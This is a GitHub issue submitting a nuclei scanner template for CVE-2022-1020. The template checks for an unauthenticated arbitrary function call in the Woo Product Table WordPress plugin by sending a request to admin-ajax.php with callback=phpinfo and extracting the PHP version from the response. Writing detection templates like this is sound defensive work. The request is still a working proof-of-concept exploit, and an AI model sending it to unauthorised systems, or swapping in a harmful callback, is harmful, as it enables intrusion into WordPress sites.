search

projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
9k stars 2.57k forks source link

CVE-2022-1020 #4203

Closed akincibor closed 2 years ago

akincibor commented 2 years ago 
id: CVE-2022-1020

info:
  name: Woo Product Table < 3.1.2 - Unauthenticated Arbitrary Function Call
  author: Akincibor
  severity: high
  description: The plugin does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
  reference:
    - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5
  tags: wp,wp-plugin,wordpress,cve,cve2022

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option&option_key=a&perpose=update&callback=phpinfo'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
princechaddha commented 2 years ago

Hello @Akincibor, thank you so much for sharing this template with the community and contributing to this project 🚀